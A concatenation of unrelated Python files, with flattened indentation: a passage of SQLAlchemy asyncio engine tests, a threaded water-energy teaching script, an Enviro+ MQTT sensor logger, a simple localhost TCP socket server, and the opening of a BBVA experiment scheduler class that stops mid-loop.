# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = engines.testing_engine(asyncio=True, transfer_staticpool=True)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = engines.testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
def test_async_engine_from_config(self):
config = {
"sqlalchemy.url": str(testing.db.url),
"sqlalchemy.echo": "true",
}
engine = async_engine_from_config(config)
assert engine.url == testing.db.url
assert engine.echo is True
assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[
mock.call(
sync_conn, mock.ANY, "select 1", mock.ANY, mock.ANY, False
)
],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
TempChange.py
|
import threading
import time
def check_energy():
""" Gets the mass and change information from list (version 2 will use other process)
Then calculates the energy needed (in Joules) & displays
Finally checks if user is finished, if not re-run after 1 seconds
WE ARE USING: A count of 24 with a wait of 1 second to mimic 24 hours & once an hour
:return: False = sets flag allowing program to exit
"""
for i in range(24):
water_mass = 46.1 - i
temp_change = i + .25
energy = 4.186 * water_mass * temp_change
print(f"The energy was {energy}")
time.sleep(1)
"""
Calculates the energy used when changing temp of water
- waits 1 seconds then repeats operation 24 times (mimicing an every hour check & log)
- Feel free to try a longer process when you get this working
- This is basically our Module 2 program as a thread
Note, if using Windows (and not a VM or subsystem of Linux) this may have a slight delay (10+ sec),
Then print all at once or when you open a different program.
I will talk about the workaround in class but its not required or included here.
"""
### Could add an if __name__ == 'main' here but I don't want this to run on import
print("Starting new daily Temp Log")
threading.Thread(target=check_energy).start()
|
logger.py
|
import collections
import threading
import traceback
import json
from subprocess import PIPE, Popen, check_output
import paho.mqtt.client as mqtt
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003
class EnvLogger:
def __init__(self, client_id, host, port, username, password, prefix, use_pms5003, num_samples, room, retain):
self.bme280 = BME280()
self.client_id = client_id
self.prefix = prefix
self.room = room
self.connection_error = None
self.client = mqtt.Client(client_id=client_id)
self.client.on_connect = self.__on_connect
self.client.username_pw_set(username, password)
self.client.connect(host, port)
self.client.loop_start()
self.samples = collections.deque(maxlen=num_samples)
self.latest_pms_readings = {}
self.use_pms5003 = use_pms5003
if self.use_pms5003:
self.pm_thread = threading.Thread(
target=self.__read_pms_continuously)
self.pm_thread.daemon = True
self.pm_thread.start()
self.retain = retain
def __on_connect(self, client, userdata, flags, rc):
errors = {
1: "incorrect MQTT protocol version",
2: "invalid MQTT client identifier",
3: "server unavailable",
4: "bad username or password",
5: "connection refused"
}
if rc > 0:
self.connection_error = errors.get(rc, "unknown error")
def __read_pms_continuously(self):
"""Continuously reads from the PMS5003 sensor and stores the most recent values
in `self.latest_pms_readings` as they become available.
If the sensor is not polled continously then readings are buffered on the PMS5003,
and over time a significant delay is introduced between changes in PM levels and
the corresponding change in reported levels."""
pms = PMS5003()
while True:
try:
pm_data = pms.read()
self.latest_pms_readings = {
"pm10": pm_data.pm_ug_per_m3(
1.0), #, atmospheric_environment=True),
"pm25": pm_data.pm_ug_per_m3(
2.5), #, atmospheric_environment=True),
"pm100": pm_data.pm_ug_per_m3(
10), #, atmospheric_environment=True),
}
except:
print("Failed to read from PMS5003. Resetting sensor.")
traceback.print_exc()
pms.reset()
def remove_sensor_config(self):
"""
Remove previous config topic cretead for each sensor
"""
print("removed")
sensors = [
"proximity",
"lux",
"temperature",
"pressure",
"humidity",
"oxidising",
"reducing",
"nh3",
"pm10",
"pm25",
"pm100",
]
for sensor in sensors:
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, '', self.retain)
def sensor_config(self):
"""
Create config topic for each sensor
"""
# homeassistant/sensor/livingRoom/temperature/config
# homeassistant/sensor/livingRoom/temperature/state
# homeassistant/livingroom/enviroplus/state
sensors = {
"proximity": {
"unit_of_measurement": "cm",
"value_template": "{{ value_json }}"
},
"lux": {
"device_class": "illuminance",
"unit_of_measurement": "lx",
"value_template": "{{ value_json }}",
"icon": "mdi:weather-sunny"
},
"temperature": {
"device_class": "temperature",
"unit_of_measurement": "°C",
"value_template": "{{ value_json }}",
"icon": "mdi:thermometer"
},
"pressure": {
"device_class": "pressure",
"unit_of_measurement": "hPa",
"value_template": "{{ value_json }}",
"icon": "mdi:arrow-down-bold"
},
"humidity": {
"device_class": "humidity",
"unit_of_measurement": "%H",
"value_template": "{{ value_json }}",
"icon": "mdi:water-percent"
},
"oxidising": {
"unit_of_measurement": "no2",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"reducing": {
"unit_of_measurement": "CO",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
"nh3": {
"unit_of_measurement": "nh3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble"
},
}
if self.use_pms5003:
sensors["pm10"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm25"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
sensors["pm100"] = {
"unit_of_measurement": "ug/m3",
"value_template": "{{ value_json }}",
"icon": "mdi:thought-bubble-outline",
}
try:
for sensor in sensors:
sensors[sensor]["name"] = f"{self.room} {sensor.capitalize()}"
sensors[sensor][
"state_topic"] = f"{self.prefix}/sensor/{self.room}/{sensor}/state"
sensors[sensor]["unique_id"] = f"{sensor}-{self.client_id}"
sensor_topic_config = f"sensor/{self.room}/{sensor}/config"
self.publish(sensor_topic_config, json.dumps(sensors[sensor]), self.retain)
print("Configs added")
except:
print("Failed to add configs.")
traceback.print_exc()
def take_readings(self):
hum_comp_factor = 1.3
readings = {}
try:
readings["proximity"] = ltr559.get_proximity()
except OSError:
print("Error reading proximity sensor data")
try:
readings["lux"] = ltr559.get_lux()
except OSError:
print("Error reading lux sensor data")
try:
readings["temperature"] = self.bme280.get_temperature()
except OSError:
print("Error reading temperature sensor data")
try:
readings["pressure"] = round(int(self.bme280.get_pressure() * 100), -1)
except OSError:
print("Error reading pressure sensor data")
try:
readings["humidity"] = round(int(self.bme280.get_humidity() * hum_comp_factor), 1)
except OSError:
print("Error reading humidity sensor data")
try:
gas_data = gas.read_all()
readings["oxidising"] = int(gas_data.oxidising / 1000)
readings["reducing"] = int(gas_data.reducing / 1000)
readings["nh3"] = int(gas_data.nh3 / 1000)
except OSError:
print("Error reading gas sensor data")
readings.update(self.latest_pms_readings)
return readings
def publish(self, topic, value, retain):
topic = self.prefix.strip("/") + "/" + topic
self.client.publish(topic, str(value), retain=retain)
def update(self, publish_readings=True):
self.samples.append(self.take_readings())
if publish_readings:
for topic in self.samples[0].keys():
try:
value_sum = sum([d[topic] for d in self.samples])
value_avg = round(value_sum / len(self.samples), 1)
self.publish(f"sensor/{self.room}/{topic}/state", value_avg, self.retain)
except KeyError:
print(f"Error publishing data for {topic}")
def destroy(self):
self.client.disconnect()
self.client.loop_stop()
|
server.py
|
#!/usr/bin/env python3
import socket
import threading
# The port that we want to bind to our server
PORT = 5050
# IP address of your computer
# SERVER = socket.gethostbyname(socket.gethostname())
SERVER = "127.0.0.1"
ADDR = (SERVER, PORT)
# Specification of my own custom protocol
HEADER_SIZE = 64
FORMAT = "utf-8"
DISCONNECT_MSG = "!DISCONNECT"
# create an INET, STREAMing socket (TCP/IP)
# AF_INET: Address Family of Internet Protocol v4
# SOCK_STREAM: TCP Socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind the socket to address
server.bind(ADDR)
def handle_client(conn, addr):
isConnected = True
print(f"[NEW CONNECTION] {addr} connected.")
# Keep receiving messages until the DISCONNECT_MSG arrives
while isConnected:
# First receive the size of incoming message
msgLength = conn.recv(HEADER_SIZE).decode(FORMAT)
# if msgLength != empty string
if msgLength != "":
msgLength = int(msgLength)
print(f"[MESSAGE LENGTH] {msgLength}")
# No receive the main message according to the size received before
msg = conn.recv(msgLength).decode(FORMAT)
if msg == DISCONNECT_MSG:
isConnected = False
print(f"[{addr}] {msg}")
# Close the client's socket connection
conn.close()
def start():
# Enable the server to accept connections
# Note: TCP is a connection-oriented protocol
server.listen()
print(f"[LISTENING] server is listening on {SERVER}")
while True:
# Wait for a new connection to the server
# conn: Connection to the client used for responding
# addr: Address of the client
conn, addr = server.accept()
# Create a separate thread for handling the new client connection
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
# Number of clients equals number of threads created for clients minus the main thread
clientsCount = threading.active_count() - 1
print(f"[ACTIVE CLIENT CONNECTIONS] {clientsCount}")
print("[STARTING] server is starting ...")
start()
|
system.py
|
"""
Copyright 2018 Banco Bilbao Vizcaya Argentaria, S.A.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# coding=utf-8
"""Launch experiments through an orchestrator."""
import threading
import time
import datetime
import logging
from .experiment import Experiment
from .dal import DAL
class System(threading.Thread):
def __init__(self, orchestrator, db, kafka_server):
threading.Thread.__init__(self)
self.logger = logging.getLogger("SCHEDULER")
self.orch = orchestrator
self.db = db
self.dal = DAL(db)
self.kafka_server = kafka_server
self.is_running = False
self.experiments_limit = 0
self.experiments_running = 0
# self.state_recovery()
def state_recovery(self):
"""
Recover the last state of the system.
"""
# Update current state from DDBB
system_parameters = self.dal.get_system_parameters()
self.is_running = system_parameters['running']
self.experiments_limit = system_parameters['experiments_limit']
pool = self.dal.get_running_experiments()
self.experiments_running = len(pool['running'])
for experiment_in_pool in pool['running']:
self.logger.warning('Experiments remaining in running pool.')
self.logger.warning('Trying to recover control')
experiment_info = self.dal.get_experiment(experiment_in_pool['experiment_id'])
experiment = Experiment(experiment_info, self.kafka_server, self.db, self.orch)
experiment.start()
self.experiments_running += 1
threading.Thread(target=experiment.control).start()
self.logger.info(
'Control recovered for experiment ' + experiment.name)
def run(self):
"""
Check the system status, and launch the experiments if possible.
"""
self.logger.info('READY TO LAUNCH EXPERIMENTS !!!!')
threading.Thread(target=self.monitor_running_experiments).start()
while True:
system_status = self.check_system()
